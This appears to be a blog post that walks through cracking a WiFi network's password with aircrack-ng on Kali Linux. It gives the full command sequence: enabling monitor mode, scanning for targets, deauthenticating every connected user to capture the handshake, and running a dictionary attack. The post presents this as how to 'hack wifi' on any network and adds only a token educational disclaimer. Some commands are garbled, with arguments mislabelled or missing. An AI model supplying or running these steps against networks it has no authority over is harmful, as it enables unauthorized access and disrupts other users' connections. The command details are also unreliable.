Thursday, February 23, 2017

Dictionary Attack on Any Wifi || Kali Linux 2.0 || Aircrack-ng

How to hack wifi with dictionary attack ?

  • First of all , fire up your kali linux then open up your terminal . For hacking wifi you must have proper wifi adapter on your device . 
  • To check wifi adapter type command : sudo ifconfig
  • Then , after that allow monitor mode for your wifi device by typing command : sudo airmon-ng start wlan0 (wlan0 is your interface name)
  • Then , type command to check all the available wifi devices on your surrounding : sudo airodump-ng wlan0mon
  • Then after finding which device to start attack type command : sudo airodump-ng -c (this is channel number ) -w (this is name of wifi Essid ) --bssid wlan0mon
  • Then after typing this command you must capture the handshake . Then , for capturing handshake kickout everyone who are using the wifi by typing command : sudo aireplay-ng -0 0 -a (this is the bssid ) wlan0mon
  • Then , wait for a while and you will get handshake file .
  • Now , you will need a dictionary file for attack to start .Moreover, you can create dictionary file by help of crunch , CUPP or can download from web.
  • Now, we must start aircrack-ng by typing command : sudo aircrack-ng -w (now this is the location of dictionary file simply drag the file into terminal ) home@network.cap(this is the name of handshake file simply copy the name) press enter then the aircrack-ng will start it's work.

Note : This is only for educational purpose .For more depth video check my youtube video down below .




No comments:

Post a Comment